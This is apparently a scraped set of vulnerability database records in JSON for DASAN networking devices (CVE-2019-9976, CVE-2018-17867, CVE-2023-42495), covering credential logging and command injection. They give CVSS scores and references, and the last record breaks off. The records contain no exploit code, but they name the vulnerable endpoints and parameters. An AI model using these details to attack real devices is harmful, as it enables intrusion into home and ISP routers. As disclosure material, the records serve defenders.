"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201904-0123",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "h660rm",
"scope": "eq",
"trust": 1.0,
"vendor": "dasannetworks",
"version": "1.03-0022"
},
{
"model": "h660rm",
"scope": "eq",
"trust": 0.8,
"vendor": "dasan",
"version": "1.03-0022"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
},
{
"db": "NVD",
"id": "CVE-2019-9976"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:dasannetworks:h660rm_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Krzysztof Burghardt",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1027"
}
],
"trust": 0.6
},
"cve": "CVE-2019-9976",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2019-9976",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "VHN-161411",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2019-9976",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-9976",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2019-9976",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201903-1027",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-161411",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2019-9976",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161411"
},
{
"db": "VULMON",
"id": "CVE-2019-9976"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1027"
},
{
"db": "NVD",
"id": "CVE-2019-9976"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Boa server configuration on DASAN H660RM devices with firmware 1.03-0022 logs POST data to the /tmp/boa-temp file, which allows logged-in users to read the credentials of administration web interface users. The DASAN H660RM device firmware contains a vulnerability related to certificate and password management. Information may be obtained or altered, and service operation may be disrupted (DoS). DASAN H660RM is a GPON optical network terminal produced by DASAN of Korea. A trust management vulnerability exists in DASAN H660RM with firmware version 1.03-0022. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords, hard-coded passwords, hard-coded certificates, etc. to attack affected components",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-9976"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
},
{
"db": "VULHUB",
"id": "VHN-161411"
},
{
"db": "VULMON",
"id": "CVE-2019-9976"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-9976",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003419",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1027",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "152232",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-161411",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2019-9976",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161411"
},
{
"db": "VULMON",
"id": "CVE-2019-9976"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1027"
},
{
"db": "NVD",
"id": "CVE-2019-9976"
}
]
},
"id": "VAR-201904-0123",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-161411"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:12:07.549000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dasannetworks.com/en/"
},
{
"title": "YABWF - Yet Another Boa Webserver Fork\n\u4ee5\u4e0b\u662f\u539fBoa Webserver\u7684README\u539f\u6587\uff0c\u7528\u4e8e\u53c2\u8003",
"trust": 0.1,
"url": "https://github.com/Knighthana/YABWF "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2019-9976"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-532",
"trust": 1.1
},
{
"problemtype": "CWE-255",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161411"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
},
{
"db": "NVD",
"id": "CVE-2019-9976"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://blog.burghardt.pl/2019/03/boa-webserver-on-dasan-h660rm-devices-with-firmware-1-03-0022-saves-post-data-including-credentials-to-tmp-boa-temp/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9976"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-9976"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/152232/dasan-h660rm-information-disclosure-hardcoded-key.html"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/532.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/knighthana/yabwf"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161411"
},
{
"db": "VULMON",
"id": "CVE-2019-9976"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1027"
},
{
"db": "NVD",
"id": "CVE-2019-9976"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-161411"
},
{
"db": "VULMON",
"id": "CVE-2019-9976"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1027"
},
{
"db": "NVD",
"id": "CVE-2019-9976"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-04-11T00:00:00",
"db": "VULHUB",
"id": "VHN-161411"
},
{
"date": "2019-04-11T00:00:00",
"db": "VULMON",
"id": "CVE-2019-9976"
},
{
"date": "2019-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003419"
},
{
"date": "2019-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1027"
},
{
"date": "2019-04-11T19:29:01.630000",
"db": "NVD",
"id": "CVE-2019-9976"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-161411"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULMON",
"id": "CVE-2019-9976"
},
{
"date": "2019-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003419"
},
{
"date": "2020-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1027"
},
{
"date": "2024-11-21T04:52:43.043000",
"db": "NVD",
"id": "CVE-2019-9976"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1027"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "DASAN H660RM Vulnerabilities related to certificate / password management in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "log information leak",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1027"
}
],
"trust": 0.6
}
}
VAR-201810-0419
Vulnerability from variot - Updated: 2024-11-23 22:06
The Port Forwarding functionality on DASAN H660GW devices allows remote attackers to execute arbitrary code via shell metacharacters in the cgi-bin/adv_nat_virsvr.asp Addr parameter (aka the Local IP Address field). The DASAN H660GW device contains a command injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Dasan H660GW is a modem device manufactured by Dasan Corporation in South Korea. There is a security hole in the Port Forwarding function in DASAN H660GW. The NVD CVSS v2 vector recorded for this entry, AV:N/AC:L/Au:S/C:C/I:C/A:C, indicates that a single authentication to the device is required.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201810-0419",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "h660gw",
"scope": "eq",
"trust": 1.6,
"vendor": "dasannetworks",
"version": null
},
{
"model": "h660gw",
"scope": null,
"trust": 0.8,
"vendor": "dasan",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-035"
},
{
"db": "NVD",
"id": "CVE-2018-17867"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:dasannetworks:h660gw_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
}
]
},
"cve": "CVE-2018-17867",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2018-17867",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-128369",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2018-17867",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-17867",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2018-17867",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201810-035",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-128369",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128369"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-035"
},
{
"db": "NVD",
"id": "CVE-2018-17867"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Port Forwarding functionality on DASAN H660GW devices allows remote attackers to execute arbitrary code via shell metacharacters in the cgi-bin/adv_nat_virsvr.asp Addr parameter (aka the Local IP Address field). DASAN H660GW devices contain a command injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Dasan H660GW is a modem device manufactured by Dasan Corporation in South Korea. There is a security vulnerability in the Port Forwarding function of the DASAN H660GW",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-17867"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
},
{
"db": "VULHUB",
"id": "VHN-128369"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-17867",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012900",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201810-035",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-128369",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128369"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-035"
},
{
"db": "NVD",
"id": "CVE-2018-17867"
}
]
},
"id": "VAR-201810-0419",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-128369"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:06:35.714000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dasannetworks.com/en/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "CWE-77",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128369"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
},
{
"db": "NVD",
"id": "CVE-2018-17867"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://wojciechregula.blog/authenticated-rce-in-dasan-routers/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-17867"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-17867"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128369"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-035"
},
{
"db": "NVD",
"id": "CVE-2018-17867"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-128369"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-035"
},
{
"db": "NVD",
"id": "CVE-2018-17867"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-01T00:00:00",
"db": "VULHUB",
"id": "VHN-128369"
},
{
"date": "2019-02-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-012900"
},
{
"date": "2018-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-035"
},
{
"date": "2018-10-01T23:29:00.717000",
"db": "NVD",
"id": "CVE-2018-17867"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-128369"
},
{
"date": "2019-02-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-012900"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-035"
},
{
"date": "2024-11-21T03:55:05.413000",
"db": "NVD",
"id": "CVE-2018-17867"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-035"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Command injection vulnerability in DASAN H660GW devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-035"
}
],
"trust": 0.6
}
}
CVE-2023-42495 (GCVE-0-2023-42495)
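Vulnerability from nvd – Published: 2023-12-13 12:48 – Updated: 2024-08-02 19:23
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

| Vendor | Product | Version | |
|---|---|---|---|
| Dasan Networks | Dasan Networks | Affected: All versions, < Upgrade to the latest version. (custom) | |

Note: the structured version fields in this record hold free text ("All versions", "Upgrade to the latest version.") rather than version numbers, while the description names W-Web versions 1.22-1.27 as affected. Match assets against the description, because automated version-range comparison on this record will not give a meaningful result.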
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T19:23:39.667Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.gov.il/en/Departments/faq/cve_advisories"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Dasan Networks",
"vendor": "Dasan Networks",
"versions": [
{
"lessThan": " Upgrade to the latest version.",
"status": "affected",
"version": "All versions",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Aviv Vinograzki, Dudu Moyal, Moriel Harush"
}
],
"datePublic": "2023-12-13T12:48:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\n\n\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eDasan Networks - W-Web versions 1.22-1.27 - CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\u003c/span\u003e\n\n"
}
],
"value": "\nDasan Networks - W-Web versions 1.22-1.27 - CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\n\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-13T12:48:41.608Z",
"orgId": "a57ee1ae-c9c1-4f40-aa7b-cf10760fde3f",
"shortName": "INCD"
},
"references": [
{
"url": "https://www.gov.il/en/Departments/faq/cve_advisories"
}
],
"source": {
"advisory": "ILVN-2023-0146",
"discovery": "UNKNOWN"
},
"title": "\t Dasan Networks - W-Web versions 1.22-1.27 - CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "a57ee1ae-c9c1-4f40-aa7b-cf10760fde3f",
"assignerShortName": "INCD",
"cveId": "CVE-2023-42495",
"datePublished": "2023-12-13T12:48:41.608Z",
"dateReserved": "2023-09-11T07:58:19.184Z",
"dateUpdated": "2024-08-02T19:23:39.667Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-42495 (GCVE-0-2023-42495)
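Vulnerability from cvelistv5 – Published: 2023-12-13 12:48 – Updated: 2024-08-02 19:23
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

| Vendor | Product | Version | |
|---|---|---|---|
| Dasan Networks | Dasan Networks | Affected: All versions, < Upgrade to the latest version. (custom) | |

Note: the structured version fields in this record hold free text ("All versions", "Upgrade to the latest version.") rather than version numbers, while the description names W-Web versions 1.22-1.27 as affected. Match assets against the description, because automated version-range comparison on this record will not give a meaningful result.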
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T19:23:39.667Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.gov.il/en/Departments/faq/cve_advisories"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Dasan Networks",
"vendor": "Dasan Networks",
"versions": [
{
"lessThan": " Upgrade to the latest version.",
"status": "affected",
"version": "All versions",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Aviv Vinograzki, Dudu Moyal, Moriel Harush"
}
],
"datePublic": "2023-12-13T12:48:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
